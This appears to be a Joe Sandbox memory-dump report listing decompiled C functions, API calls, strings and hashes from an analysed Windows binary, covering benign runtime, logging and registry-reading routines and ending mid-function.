Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: _strlen
String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__s != nullptr$string::append received nullptr
API String ID: 4218353326-424192179
Opcode ID: 27f04b2a6073a7201df44d07cd9dace0325b9d46d46eedd20b3aba0b01359816
Instruction ID: ead1d838e3d3ee55a19cf16c535a77fc016a7d8d396b49eebfb3682903485bd1
Opcode Fuzzy Hash: 27f04b2a6073a7201df44d07cd9dace0325b9d46d46eedd20b3aba0b01359816
Instruction Fuzzy Hash: 47F0283230055436DE22601AEC16EFF7E5DCBC1F71F04402BF80896583CAA59D0263E6

Uniqueness

Uniqueness Score: -1.00%

Function 000EA744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E000EA744(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x120014; // 0xf049169a
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E0010515E, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x137000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x000ea759
0x000ea764
0x000ea76a
0x000ea76e
0x000ea779
0x000ea781
0x000ea78b
0x000ea791
0x000ea795
0x000ea79c
0x000ea7a2
0x000ea7a2
0x000ea795
0x000ea7a8
0x000ea7ad
0x000ea7ad
0x000ea7b6
0x000ea7c0

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F049169A,00000000,?,00000000,0010515E,000000FF,?,000EA80E,000722C9,?,000EA8AA,?), ref: 000EA779
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000EA78B
FreeLibrary.KERNEL32(00000000,?,00000000,0010515E,000000FF,?,000EA80E,000722C9,?,000EA8AA,?), ref: 000EA7AD

Strings

CorExitProcess, xrefs: 000EA783
mscoree.dll, xrefs: 000EA772

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a43002a280e71ae579f76b3344ffca7ac3b1f219653e87fc28bf1c8dcafa66b6
Instruction ID: a695142a7220fc61c481e882febb44c34f800ded22d606b11eb4d6bf2e1c0544
Opcode Fuzzy Hash: a43002a280e71ae579f76b3344ffca7ac3b1f219653e87fc28bf1c8dcafa66b6
Instruction Fuzzy Hash: 5701A731A08659EFDB158B50DC45BAEB7B8FB08714F000125F851A2AD0DBB59940CA51

Uniqueness

Uniqueness Score: -1.00%

Function 000DC080 Relevance: 7.6, APIs: 5, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

InitOnceExecuteOnce.KERNEL32(001361B0,000DC060,000DC1C0,00000000), ref: 000DC0B7
TlsGetValue.KERNEL32 ref: 000DC0D8
AcquireSRWLockExclusive.KERNEL32(001361BC), ref: 000DC0ED
ReleaseSRWLockExclusive.KERNEL32(001361BC), ref: 000DC11C
TlsAlloc.KERNEL32 ref: 000DC1C3

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLockOnce$AcquireAllocExecuteInitReleaseValue
String ID:
API String ID: 655554649-0
Opcode ID: 8a46ed4fd2fea6f1d34f575be3c911ae2464186dfae51eee0acb480aa6ddc650
Instruction ID: de87b20d08fe800de0cba81c046104d15df3ffafd1afc8e45e2e13c44540f02e
Opcode Fuzzy Hash: 8a46ed4fd2fea6f1d34f575be3c911ae2464186dfae51eee0acb480aa6ddc650
Instruction Fuzzy Hash: 3031E6796043199FEB14DF60ED85ABE77B4FF8A710B04802DE80693792DB35AC45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0009C360 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0009C360(long __ecx, char* __edx, void* __fp0) {
				signed int _v20;
				signed int _v1033;
				signed int _v1040;
				long _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1053;
				signed int _v1060;
				char _v1064;
				signed int _v1065;
				long _v1068;
				signed int _v1072;
				char _v1076;
				char _v1080;
				long _v1084;
				CHAR* _v1088;
				intOrPtr _v1092;
				signed int _v1096;
				intOrPtr _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t139;
				intOrPtr* _t144;
				signed char _t157;
				char* _t168;
				void* _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				CHAR* _t183;
				intOrPtr _t185;
				signed int _t192;
				signed int _t195;
				void* _t200;
				void* _t206;
				void* _t214;
				void* _t217;
				signed int _t218;
				long _t223;
				intOrPtr* _t236;
				intOrPtr _t243;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				intOrPtr _t251;
				intOrPtr _t261;
				intOrPtr _t265;
				char* _t266;
				CHAR* _t268;
				char* _t272;
				intOrPtr _t274;
				void* _t275;
				intOrPtr _t277;
				long _t283;
				intOrPtr _t285;
				DWORD* _t288;
				CHAR* _t291;
				intOrPtr _t293;
				signed int _t294;
				signed int _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t310;
				void* _t334;

				_t345 = __fp0;
				_t263 = __edx;
				_t294 = _t296;
				_push(_t217);
				_t297 = _t296 - 0x43c;
				_t139 =  *0x120014; // 0xf049169a
				_v20 = _t139 ^ _t294;
				 *((intOrPtr*)(__ecx)) = 0x10f06c;
				_t268 = __ecx + 8;
				_v1084 = __ecx;
				_t280 =  &_v1044;
				_v1092 = __ecx + 0xc;
				L00071AD0(_t139 ^ _t294, _t217, __ecx + 0xc, _t268, __fp0,  &_v1044);
				_t218 = _v1033 & 0x000000ff;
				_t303 = _t218;
				if(_t218 < 0) {
					_t218 = _v1040;
					L000DDBEC(_v1044);
					_t297 = _t297 + 4;
				}
				_v1096 = _t218;
				L0007AD2A( *((intOrPtr*)( *_t268 + 4)) + _t268, _t280);
				_t144 = L0008ED38(_t218, _t280, _t263, _t268, _t303, 0x126280);
				_v1088 = _t268;
				 *0x137000();
				_t219 =  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 0x1c))))(0xa);
				L0007CCBE( &_v1044);
				E00071360(_v1088, _t147);
				E000707A0(_v1088);
				_v1076 = 0xffffffff;
				_v1072 = 0xffffffff;
				_v1068 = 0xffffffff;
				_t270 = _v1092;
				_v1088 =  &_v1076;
				L00071AD0( &_v1076, _t147, _v1092, _v1092, _t345,  &_v1076);
				_t283 = _v1084;
				if(( *0x1220ec & 0x00000019) != 0) {
					_v1044 = _t283;
					_v1040 =  &_v1076;
					_t263 = 0;
					L0009CD90("LogMessage", 0, __eflags, _t345, 0,  &_v1044);
					_t297 = _t297 + 8;
					__eflags =  *((intOrPtr*)(_t283 + 4)) - 3;
					if(__eflags == 0) {
						L4:
						if( *0x1269b4 == 0) {
							 *0x1269b4 = 1;
							_t207 =  *0x1269bc;
							_t263 =  *[fs:0x2c];
							if( *0x1269bc >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] +  *0x123e38 * 4)) + 4))) {
								_t207 = L000DDC67(_t207, 0x1269bc);
								_t297 = _t297 + 4;
								__eflags =  *0x1269bc - 0xffffffff;
								if( *0x1269bc == 0xffffffff) {
									 *0x1269b8 = E000A7200("LOG_FATAL", 0x400);
									_t207 = L000DDCDD(0x1269bc);
									_t297 = _t297 + 0xc;
								}
							}
							_t223 =  &_v1044;
							L00071AD0(_t207, _t223, _t270, _t270, _t345, _t223);
							if(_v1033 < 0) {
								_t223 = _v1044;
							}
							_t219 = _t223 +  *((intOrPtr*)(_t283 + 0x90));
							_t277 =  *((intOrPtr*)(_t283 + 0x94));
							_t293 =  *((intOrPtr*)(_t283 + 0x98));
							if(_t277 == 0) {
								_t261 = 0;
								__eflags = 0;
							} else {
								_t214 = E000E1430(_t277, 0x5c);
								_t297 = _t297 + 8;
								_t310 = _t214;
								_t261 =  ==  ? _t277 : _t214 + 1;
							}
							_t278 =  &_v1064;
							_push(_t219);
							_push(_t293);
							L000A6F40(_t219,  &_v1064, _t310,  &_v1064, "%s:%d: %s", _t261);
							_t301 = _t297 + 0x14;
							if(_v1033 < 0) {
								L000DDBEC(_v1044);
								_t301 = _t301 + 4;
							}
							_t210 = _v1053 & 0x000000ff;
							_t283 = _v1084;
							if((_v1053 & 0x000000ff) < 0) {
								_t278 = _v1064;
								_t210 = _v1060;
							}
							E000A7240( *0x1269b8, _t278, _t210);
							_t297 = _t301 + 0xc;
							if(_v1053 < 0) {
								L000DDBEC(_v1064);
								_t297 = _t297 + 4;
							}
							 *0x1269b4 = 0;
							_t270 = _v1092;
						}
						L18:
						_t236 =  *0x12698c; // 0x0
						if(_t236 == 0) {
							L20:
							_t157 =  *0x121be0; // 0x1
							if((_t157 & 0x00000002) != 0) {
								if(_v1065 < 0) {
									_v1088 = _v1076;
								}
								OutputDebugStringA(_v1088);
								_t157 =  *0x121be0;
							}
							if((_t157 & 0x00000004) != 0 ||  *((intOrPtr*)(_t283 + 4)) >= 2 && _t157 <= 1) {
								_t219 =  <  ? _v1072 : _v1065 & 0x000000ff;
								_t283 =  <  ? _v1076 :  &_v1076;
								if(_t219 != 0) {
									_t275 = 0;
									asm("o16 nop [cs:eax+eax]");
									while(1) {
										_t200 = E000F05EE(_t219, _t275, 2, _t283 + _t275, _t219 - _t275);
										_t297 = _t297 + 0xc;
										if(_t200 < 0) {
											break;
										}
										_t275 = _t275 + _t200;
										if(_t275 < _t219) {
											continue;
										}
										break;
									}
									_t157 =  *0x121be0;
									_t270 = _v1092;
								}
								goto L32;
							} else {
								L32:
								if((_t157 & 0x00000001) != 0 && L0009BC70(_t219, _t270, _t283, _t345) != 0) {
									_v1044 = 0xffffffff;
									_t195 = _v1065 & 0x000000ff;
									_t196 =  <  ? _v1072 : _t195;
									_t256 =  <  ? _v1076 :  &_v1076;
									_t263 =  &_v1044;
									WriteFile( *0x126998,  <  ? _v1076 :  &_v1076,  <  ? _v1072 : _t195,  &_v1044, 0);
								}
								_t285 = _v1084;
								if( *((intOrPtr*)(_t285 + 4)) != 3) {
									L60:
									if(_v1065 < 0) {
										L000DDBEC(_v1076);
										_t297 = _t297 + 4;
									}
									E000A53F0(_t285 + 0x9c);
									 *((intOrPtr*)(_t285 +  *((intOrPtr*)( *((intOrPtr*)(_t285 + 8)) + 4)) + 8)) = 0x10f544;
									 *((intOrPtr*)(_t285 + 0xc)) = 0x10f550;
									if( *((char*)(_t285 + 0x37)) < 0) {
										L000DDBEC( *((intOrPtr*)(_t285 + 0x2c)));
										_t297 = _t297 + 4;
									}
									E00070790(E0007041E(_t270));
									return E000DE643(E00070414(_t285 + 0x40), _t219, _v20 ^ _t294, _t263, _t270, _t285 + 0x40);
								} else {
									_t243 =  *0x131278; // 0x0
									_t288 =  &_v1044;
									if(_t243 != 0) {
										_t192 = _v1065 & 0x000000ff;
										_t331 = _t192;
										if(_t192 >= 0) {
											_t266 =  &_v1076;
										} else {
											_t266 = _v1076;
											_t192 = _v1072;
										}
										E000A65F0(_t243, _t331, _t266, _t192);
									}
									E000E11A0(_t270, _t288, 0xff, 0x400);
									_t299 = _t297 + 0xc;
									if(_v1065 >= 0) {
										_t168 =  &_v1076;
									} else {
										_t168 = _v1076;
									}
									_t169 = E000A40B0(_t288, _t168, 0x400);
									_push(_t288);
									E00070790(_t169);
									_t297 = _t299 + 0x10;
									_t171 =  *0x1269b0; // 0x0
									_t244 =  *0x123e38; // 0x0
									if(_t171 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t244 * 4)) + 4))) {
										L000DDC67(_t171, 0x1269b0);
										_t297 = _t297 + 4;
										__eflags =  *0x1269b0 - 0xffffffff;
										if( *0x1269b0 == 0xffffffff) {
											asm("xorps xmm0, xmm0");
											asm("movups [0x1269a0], xmm0");
											L000DDCDD(0x1269b0);
											_t297 = _t297 + 4;
										}
									}
									_t173 =  *0x1269a8; // 0x0
									_t334 = _t173 -  *0x1269ac; // 0x0
									if(_t334 == 0) {
										asm("int3");
										asm("ud2");
										goto L74;
									} else {
										_v1080 = 0xffffffff;
										_t175 =  *0x1269b0; // 0x0
										_t246 =  *0x123e38; // 0x0
										_t263 =  *[fs:0x2c];
										if(_t175 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t246 * 4)) + 4))) {
											L000DDC67(_t175, 0x1269b0);
											_t297 = _t297 + 4;
											__eflags =  *0x1269b0 - 0xffffffff;
											if( *0x1269b0 == 0xffffffff) {
												asm("xorps xmm0, xmm0");
												asm("movups [0x1269a0], xmm0");
												L000DDCDD(0x1269b0);
												_t297 = _t297 + 4;
											}
										}
										_t177 =  *0x1269ac; // 0x0
										_t248 =  *0x1269a4; // 0x0
										_t178 =  ==  ? _t248 : _t177;
										_t179 = ( ==  ? _t248 : _t177) - 1;
										if(_t248 < ( ==  ? _t248 : _t177) - 1) {
											L74:
											asm("int3");
											asm("ud2");
											goto L75;
										} else {
											E000A5370( &_v1080, _t270, (_t179 << 2) +  *0x1269a0);
											_t183 = _v1080;
											if(_t183 == 0) {
												L59:
												E000A5340( &_v1080);
												_t285 = _v1084;
												goto L60;
											}
											if(_v1065 >= 0) {
												_t272 =  &_v1076;
											} else {
												_t272 = _v1076;
											}
											_t219 = _t272 + _v1096;
											_v1088 = _t183;
											if(_t219 == 0) {
												_t185 = 0;
												__eflags = 0;
											} else {
												_t185 = E000F31A0(_t219);
												_t297 = _t297 + 4;
											}
											_t265 = _v1084;
											_t251 =  *((intOrPtr*)(_t265 + 0x90));
											_v1096 =  *((intOrPtr*)(_t265 + 0x94));
											_v1100 =  *((intOrPtr*)(_t265 + 0x98));
											_v1064 = _t272 + _t251;
											_v1060 = _v1096 - _t251;
											_v1052 = _t219;
											_v1048 = _t185;
											_t291 = _v1088;
											asm("lock xadd [esi], eax");
											if(1 <= 0) {
												L75:
												asm("int3");
												asm("ud2");
												asm("int3");
												_push(_t294);
												return GetLastError();
											} else {
												_t274 = _v1080;
												 *0x137000();
												_t263 =  &_v1064;
												 *((intOrPtr*)( *((intOrPtr*)(_t274 + 4))))(_t274, _v1096, _v1100,  &_v1064,  &_v1052);
												_t297 = _t297 + 0x14;
												asm("lock dec dword [esi]");
												if(1 == 0) {
													E000A52B0(_t291);
													_t297 = _t297 + 4;
												}
												_t270 = _v1092;
												goto L59;
											}
										}
									}
								}
							}
						}
						_v1100 =  *((intOrPtr*)(_t283 + 4));
						_t219 =  *((intOrPtr*)(_t283 + 0x98));
						 *0x137000();
						_t270 = _v1092;
						_t285 = _v1084;
						_t206 =  *_t236(_v1100,  *((intOrPtr*)(_v1084 + 0x94)),  *((intOrPtr*)(_t283 + 0x98)),  *((intOrPtr*)(_t283 + 0x90)),  &_v1076);
						_t297 = _t297 + 0x14;
						if(_t206 != 0) {
							goto L60;
						}
						goto L20;
					}
					goto L18;
				}
				if( *((intOrPtr*)(_t283 + 4)) != 3) {
					goto L18;
				}
				goto L4;
			}

0x0009c360
0x0009c360
0x0009c361
0x0009c363
0x0009c366
0x0009c36c
0x0009c373
0x0009c376
0x0009c37c
0x0009c37f
0x0009c388
0x0009c38e
0x0009c395
0x0009c39a
0x0009c3a1
0x0009c3a3
0x0009c3a5
0x0009c3b1
0x0009c3b6
0x0009c3b6
0x0009c3b9
0x0009c3c7
0x0009c3d3
0x0009c3d8
0x0009c3e7
0x0009c3f3
0x0009c3fb
0x0009c40c
0x0009c413
0x0009c418
0x0009c422
0x0009c42c
0x0009c43c
0x0009c444
0x0009c44b
0x0009c457
0x0009c45d
0x0009c91e
0x0009c92a
0x0009c935
0x0009c940
0x0009c945
0x0009c948
0x0009c94c
0x0009c46d
0x0009c474
0x0009c47a
0x0009c481
0x0009c48c
0x0009c49c
0x0009c95c
0x0009c961
0x0009c964
0x0009c96b
0x0009c983
0x0009c98d
0x0009c992
0x0009c992
0x0009c96b
0x0009c4a4
0x0009c4ab
0x0009c4b7
0x0009c4b9
0x0009c4b9
0x0009c4bf
0x0009c4c5
0x0009c4cb
0x0009c4d3
0x0009c4ea
0x0009c4ea
0x0009c4d5
0x0009c4d8
0x0009c4dd
0x0009c4e3
0x0009c4e5
0x0009c4e5
0x0009c4ec
0x0009c4f2
0x0009c4f3
0x0009c4fb
0x0009c500
0x0009c50a
0x0009c512
0x0009c517
0x0009c517
0x0009c51a
0x0009c523
0x0009c529
0x0009c52b
0x0009c531
0x0009c531
0x0009c53f
0x0009c544
0x0009c54e
0x0009c556
0x0009c55b
0x0009c55b
0x0009c55e
0x0009c565
0x0009c565
0x0009c56b
0x0009c56b
0x0009c573
0x0009c5c5
0x0009c5c5
0x0009c5cc
0x0009c5d5
0x0009c5dd
0x0009c5dd
0x0009c5e9
0x0009c5ef
0x0009c5ef
0x0009c5f6
0x0009c60c
0x0009c619
0x0009c622
0x0009c624
0x0009c626
0x0009c630
0x0009c63b
0x0009c640
0x0009c645
0x00000000
0x00000000
0x0009c647
0x0009c64b
0x00000000
0x00000000
0x00000000
0x0009c64b
0x0009c64d
0x0009c652
0x0009c652
0x00000000
0x0009c658
0x0009c658
0x0009c65a
0x0009c665
0x0009c66f
0x0009c678
0x0009c685
0x0009c68e
0x0009c69d
0x0009c69d
0x0009c6a3
0x0009c6ad
0x0009c8a9
0x0009c8b0
0x0009c8b8
0x0009c8bd
0x0009c8bd
0x0009c8c6
0x0009c8d1
0x0009c8d9
0x0009c8e4
0x0009c8e9
0x0009c8ee
0x0009c8ee
0x0009c8fd
0x0009c91d
0x0009c6b3
0x0009c6b3
0x0009c6bb
0x0009c6c1
0x0009c6c3
0x0009c6ca
0x0009c6cc
0x0009c6dc
0x0009c6ce
0x0009c6ce
0x0009c6d4
0x0009c6d4
0x0009c6e4
0x0009c6e4
0x0009c6f4
0x0009c6f9
0x0009c703
0x0009c70d
0x0009c705
0x0009c705
0x0009c705
0x0009c71a
0x0009c722
0x0009c723
0x0009c728
0x0009c72b
0x0009c730
0x0009c746
0x0009c99f
0x0009c9a4
0x0009c9a7
0x0009c9ae
0x0009c9b4
0x0009c9b7
0x0009c9c3
0x0009c9c8
0x0009c9c8
0x0009c9ae
0x0009c74c
0x0009c751
0x0009c757
0x0009ca06
0x0009ca07
0x00000000
0x0009c75d
0x0009c75d
0x0009c767
0x0009c76c
0x0009c772
0x0009c782
0x0009c9d5
0x0009c9da
0x0009c9dd
0x0009c9e4
0x0009c9ea
0x0009c9ed
0x0009c9f9
0x0009c9fe
0x0009c9fe
0x0009c9e4
0x0009c788
0x0009c78f
0x0009c795
0x0009c798
0x0009c79b
0x0009ca09
0x0009ca09
0x0009ca0a
0x00000000
0x0009c7a1
0x0009c7b1
0x0009c7b6
0x0009c7be
0x0009c898
0x0009c89e
0x0009c8a3
0x00000000
0x0009c8a3
0x0009c7cb
0x0009c7d5
0x0009c7cd
0x0009c7cd
0x0009c7cd
0x0009c7dd
0x0009c7e3
0x0009c7e9
0x0009c7f6
0x0009c7f6
0x0009c7eb
0x0009c7ec
0x0009c7f1
0x0009c7f1
0x0009c7f8
0x0009c7fe
0x0009c814
0x0009c820
0x0009c826
0x0009c82c
0x0009c832
0x0009c838
0x0009c843
0x0009c849
0x0009c84f
0x0009ca0c
0x0009ca0c
0x0009ca0d
0x0009ca0f
0x0009ca10
0x0009ca14
0x0009c855
0x0009c855
0x0009c85e
0x0009c86a
0x0009c87f
0x0009c881
0x0009c884
0x0009c887
0x0009c88a
0x0009c88f
0x0009c88f
0x0009c892
0x00000000
0x0009c892
0x0009c84f
0x0009c79b
0x0009c757
0x0009c6ad
0x0009c5f6
0x0009c578
0x0009c584
0x0009c596
0x0009c5a4
0x0009c5ac
0x0009c5b8
0x0009c5ba
0x0009c5bf
0x00000000
0x00000000
0x00000000
0x0009c5bf
0x00000000
0x0009c952
0x0009c467
0x00000000
0x00000000
0x00000000

Strings

LogMessage, xrefs: 0009C930

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID: LogMessage
API String ID: 0-3667181074
Opcode ID: 4e987cc9ab9b3ba1d6b487034ae49ad2dafc73c9d70e4e5d8777a85c3d41cc4f
Instruction ID: 1369e6a2624fab8b6981eb948d1e19394baf5b5d51161fa42e40295a33afba6b
Opcode Fuzzy Hash: 4e987cc9ab9b3ba1d6b487034ae49ad2dafc73c9d70e4e5d8777a85c3d41cc4f
Instruction Fuzzy Hash: E2B1BEB1E002289FEF24DB24DC81BE9B3B5BF45314F4441A9E60967682DB306EC5CF99

Uniqueness

Uniqueness Score: -1.00%

Function 000B17E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E000B17E0(void** __ecx, void* __edx, void* __eflags, short* _a4, void** _a8) {
				signed int _v20;
				short _v2068;
				char _v4116;
				char _v4120;
				int _v4124;
				int _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				long _t36;
				void** _t45;
				void* _t46;
				void* _t47;
				long _t49;
				void** _t50;
				signed int _t51;
				void* _t52;
				void* _t54;

				_t46 = __edx;
				L000DEF60(0x1010);
				_t50 = __ecx;
				_t22 =  *0x120014; // 0xf049169a
				_v20 = _t22 ^ _t51;
				E000E11A0(_t47,  &_v2068, 0xff, 0x800);
				_v4124 = 1;
				_v4128 = 0x800;
				_v4120 = 0xff;
				_t38 =  &_v4116;
				L000A4C80( &_v4116, "ReadValue", "..\\..\\base\\win\\registry.cc", 0x1ad);
				_t54 = _t52 + 0x1c;
				L000C5A40( &_v4120,  &_v4116,  *_t50, 1);
				_t49 = RegQueryValueExW( *_t50, _a4, 0,  &_v4124,  &_v2068,  &_v4128);
				_t31 = E00070790(_t30);
				if(_t49 == 0) {
					_t38 =  &_v4116;
					_t50 = _a8;
					_t31 = _v4124;
					if(_t31 == 2) {
						E000E11A0(_t49, _t38, 0xff, 0x800);
						_t54 = _t54 + 0xc;
						_t36 = ExpandEnvironmentStringsW( &_v2068, _t38, 0x400);
						_v4128 = _t36;
						_t31 = _t36 + 0xfffffbff;
						_t49 = 0xea;
						if(_t36 + 0xfffffbff >= 0xfffffc00) {
							_t45 = _t50;
							_push(_t38);
							goto L6;
						}
					} else {
						_t49 = 0x3f4;
						if(_t31 == 1) {
							_t45 = _t50;
							_push( &_v2068);
							L6:
							_t31 = L0009581E(_t45);
							_t49 = 0;
						}
					}
				}
				E000DE643(_t31, _t38, _v20 ^ _t51, _t46, _t49, _t50);
				return _t49;
			}

0x000b17e0
0x000b17eb
0x000b17f0
0x000b17f2
0x000b17f9
0x000b180d
0x000b1815
0x000b181f
0x000b1829
0x000b1832
0x000b1848
0x000b184d
0x000b185a
0x000b1881
0x000b1889
0x000b1890
0x000b1892
0x000b1898
0x000b189b
0x000b18a4
0x000b18c6
0x000b18cb
0x000b18db
0x000b18e1
0x000b18e7
0x000b18ec
0x000b18f6
0x000b18f8
0x000b18fa
0x00000000
0x000b18fa
0x000b18a6
0x000b18a6
0x000b18ae
0x000b18b0
0x000b18b8
0x000b18fb
0x000b18fb
0x000b1900
0x000b1900
0x000b18ae
0x000b18a4
0x000b1907
0x000b1918

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,FFFFFFFF,00000001), ref: 000B187B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000400,?,FFFFFFFF,00000001), ref: 000B18DB

Strings

ReadValue, xrefs: 000B1842
..\..\base\win\registry.cc, xrefs: 000B183D

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: EnvironmentExpandQueryStringsValue
String ID: ..\..\base\win\registry.cc$ReadValue
API String ID: 1756134249-2708835790
Opcode ID: 523a4a21724c567a431ee54859c85edc249b759f1edab9085bb7b4f81f6fb683
Instruction ID: fe0f8ba0605c5e97839e9e3bf75796adc855f9f7421c0bb64c29860ea10cfe1d
Opcode Fuzzy Hash: 523a4a21724c567a431ee54859c85edc249b759f1edab9085bb7b4f81f6fb683
Instruction Fuzzy Hash: 2E31E77194025CBBDB309B14DC42FDA737CBF44310F1044A5F599A7291DAB4ABC59FA0

Uniqueness

Uniqueness Score: -1.00%

Function 000B1630 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E000B1630(void** __ecx, void* __edx, void* __eflags, void* _a4, short* _a8, int _a12) {
				signed int _v20;
				char _v24;
				void* _v40;
				void** _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t23;
				int _t25;
				void* _t31;
				void* _t32;
				void* _t33;
				void** _t34;
				signed int _t35;

				_t31 = __edx;
				_v44 = __ecx;
				_t25 = _a12;
				_t32 = _a4;
				_t15 =  *0x120014; // 0xf049169a
				_v20 = _t15 ^ _t35;
				_v24 = 0xff;
